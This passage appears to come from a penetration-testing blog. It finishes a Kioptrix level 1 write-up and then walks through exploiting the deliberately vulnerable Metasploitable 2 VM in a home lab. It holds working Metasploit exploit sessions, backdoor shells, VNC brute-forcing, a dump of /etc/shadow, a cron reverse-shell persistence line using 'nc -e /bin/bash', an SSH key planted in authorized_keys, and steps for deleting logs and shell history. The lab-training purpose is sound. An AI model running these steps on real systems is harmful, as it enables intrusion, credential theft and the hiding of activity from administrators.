|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

Used nbtscan to scan for NetBIOS information.

Did a simple smb enumeration using enum4linux tool and found out the victim is running Samba 2.2.1a, which is vulnerable to Samba trans2open Overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability is listed below, which is from rapid7’s Vulnerability & Exploit Database.With that, I used the metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.

Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting root shell I found the flag in /var/spool/mail which said :
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”
.
Well it that’s it for level 1. It will only get harder from here. Next is Level 2.

Metasploitable is a virtual machine that was intended to be vulnerable so you could test out some penetration tools and perform some common penetration techniques on it. What I will do is go through the 5 phases of a pentration test(except reconnaissance) and talk about some of the tools and type of exploits I used. Granted Metasploitable 2 has many other vulnerabilities, but I will only cover a few which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

 192.168.182.147 

Metasploitable 2

 192.168.182.150 

Scanning and Enumeration

Scanning with nmap

Using nmap to do a version scan with OS detection shows the services and versions each service is running. According to nman the OS is running Linux 2.6.X as well.

root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST
Nmap scan report for 192.168.182.150
Host is up (0.012s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37131/tcp open  nlockmgr    1-4 (RPC #100021)
38108/tcp open  unknown
53107/tcp open  mountd      1-3 (RPC #100005)
54247/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:13:C8:C2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Banner grabing (port 23)

This was very intersting! I was able to find out username and password credentials(msfadmin/msfadmin) just by a simple banner grab using telnet.

root@kali:~# telnet 192.168.182.150
Trying 192.168.182.150...
Connected to 192.168.182.150.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: 

Banner grabbing port web server

Using netcat we found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). I also found out that getting on my web browser and connecting to http://192.168.182.150 I was able to find services like Damn Vulnerable Web App, Multillidae, phphMyAdmin, Wiki, and WebDAV, running on the victim machine as well as the username msfadmin and password msfadmin credentials to log in.


VNC on port 5900

On the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it but it requires a password to get it. I will brute-force my way in later in this pentest.

root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Reading password failed
root@kali:~# 

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap Metasploitable is running VSFTPD v2.3.4., which in 2011 this backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011. This backdoor was removed on July 3rd 2011. We are going to check to see if this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, then it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we use Netcat and connect to port 6200 we will get a root shell, which indicates the backdoor is present. Could also Metasploit framework for this exploit as well, located Here.

root@kali:~# ftp 192.168.182.150
Connected to 192.168.182.150.
220 (vsFTPd 2.3.4)
Name (192.168.182.150:root): backdoor:)
331 Please specify the password.
Password:
root@kali:~# nc 192.168.182.150 6200
whoami
root
id
uid=0(root) gid=0(root)
ls -l
total 85
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13800 Feb  4 00:27 dev
drwxr-xr-x  95 root root  4096 Feb  4 00:30 etc
drwxr-xr-x   6 root root  4096 Apr 16  2010 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 10147 Feb  4 00:30 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 108 root root     0 Feb  4 00:27 proc
drwxr-xr-x  13 root root  4096 Feb  4 00:30 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Feb  4 00:27 sys
drwxrwxrwt   4 root root  4096 Feb  4 00:30 tmp
drwxr-xr-x  12 root root  4096 Apr 27  2010 usr
drwxr-xr-x  15 root root  4096 May 20  2012 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)

Searching for a java exploit, I stumbled across this on the Rapid7 Vulnerability & Exploit Database,.

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      192.168.182.150  yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw
[*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw
[*] Server started.
[*] 192.168.182.150:1099 - Sending RMI Header...
[*] 192.168.182.150:1099 - Sending RMI Call...
[*] 192.168.182.150  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.182.150
[*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Ingreslock (Port 1524)

The ingreslock is used to lock parts of an Ingres database, however is it also used as a backdoor set by trojans to get into a system. A simple netcat connection is all we need to exploit this.

root@kali:~# nc 192.168.182.150 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# 

NFS Share misconfiguration (Port 2049)

NFS(Network File Share) is a service, in Unix, used to share resources across the network, however system admistrators need to pay attention because misconfiguring it could present a vulnerability like the one shown here. During the nmap scan it was shown that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I was able to discover that the root directory was being shared!! As you know, for sure I was going to exploit this vulnerability listed below.

Showing NFS server’s export list

root@kali:~# showmount -e 192.168.182.150
Export list for 192.168.182.150:
/ *
root@kali:~# 

Making a mount point in order to get view all the contents of the server. I also run the df -h command in order to show that we have access to the root directory of the server. In the post exploitation phase I will add a ssh key on the server’s authorized_keys file. More will be explained later in this guide.

 
root@kali:~# mkdir /temp/root_access2Metaploitable/
root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock
root@kali:~# df -h
Filesystem         Size  Used Avail Use% Mounted on
udev                10M     0   10M   0% /dev
tmpfs              1.6G  9.1M  1.6G   1% /run
/dev/sda1           57G   17G   38G  31% /
tmpfs              3.9G  212K  3.9G   1% /dev/shm
tmpfs              5.0M     0  5.0M   0% /run/lock
tmpfs              3.9G     0  3.9G   0% /sys/fs/cgroup
tmpfs              798M  8.0K  798M   1% /run/user/132
tmpfs              798M   12K  798M   1% /run/user/0
/dev/sr0           3.1G  3.1G     0 100% /media/cdrom0
192.168.182.150:/  7.0G  1.5G  5.2G  22% /temp/root_access2Metaploitable

Bruteforcing Vncviewer Login Credentials (Port 5900)

Usinging Metasploit’s auxiliary module “auxiliary/scanner/vnc/vnc_login” I used it to brute-force the victim and get the password “password”. With this I was able to go back run vncviewer again with the correct credentials and not only get a GUI but also root shell into the system!

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150
RHOSTS => 192.168.182.150
msf auxiliary(vnc_login) > run

[*] 192.168.182.150:5900 - Starting VNC login sweep
[!] No active DB -- Credential data will not be saved!
[+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_login) > 
root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Lets use the Metasploit Framework with exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit this backdoor.

root@kali:~# msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] Connected to 192.168.182.150:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ce3SW1J9SQ4K3cOX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ce3SW1J9SQ4K3cOX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600

id
uid=0(root) gid=0(root)
whoami
root

Post Exploitation

Getting the usernames and passwords from the Victim

When you have a reverse shell, you could use the cat command to show what the contents in the /etc/shadow file. This displays the hashes to the passwords to the usernames. With further investigation, you can tell that these are MD5(Unix) passwords.

root@metasploitable:/# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
root@metasploitable:/# 

Enable a Cron Job to run every 5 minutes

Using the command below we can run a cron job to run every 5 minutes which would run Netcat to return us a root shell. Open /etc/crontab on the linux victim and pasting the line below to the end of the file. Exit and save the file and restart the cron service by entering service cron restart. Now all you have to do is set up a Netcat listener on your kali machine to pick up the shell.

 */5 * * * * root nc 192.168.182.147 12345 -e /bin/bash 

This will setup the listener to grab the shell

nc -lvp 12345

Adding a SSH key on the Server for future use

Since we have access to the servers SSH keys, I will be generating my own ssh key using ssh-keygen and append it to Metasploitable’s authorized_keys file using the
cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys command.

 
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|                 |
|                 |
|        S . .    |
|         = oE. o |
|        o.+o o..o|
|     .  =+..+.o..|
|     .=*o........|
+-----------------+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

We now have successfully authenticated to the server with the user root without needing a password. I could come back to this anytime now without password authentication.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb  4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# 

Covering Tracks

Clear Event Logs

Either using kwrite, edit, vi, etc, open the file /var/log/messages. From there you can delete any entries related to when you compromised the system or delete all the entries if you like.

Clearing terminal history

You can clear your current session’s bash history using the command history -c

You can also remove .bash_history file on the victim’s machine to remove all the history as well.

rm ~/.bash_history

Conclusion

Metasploitable provides us with common vulnerabilities and gives us a VM in which we can test some penetration techniques, however this is just a start to those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs located in Vulnhub and
Pentester Labs .

Note– I will continue to add more this guide with time. If you have any comments, questions, or any other topics you would want me to cover, let me know.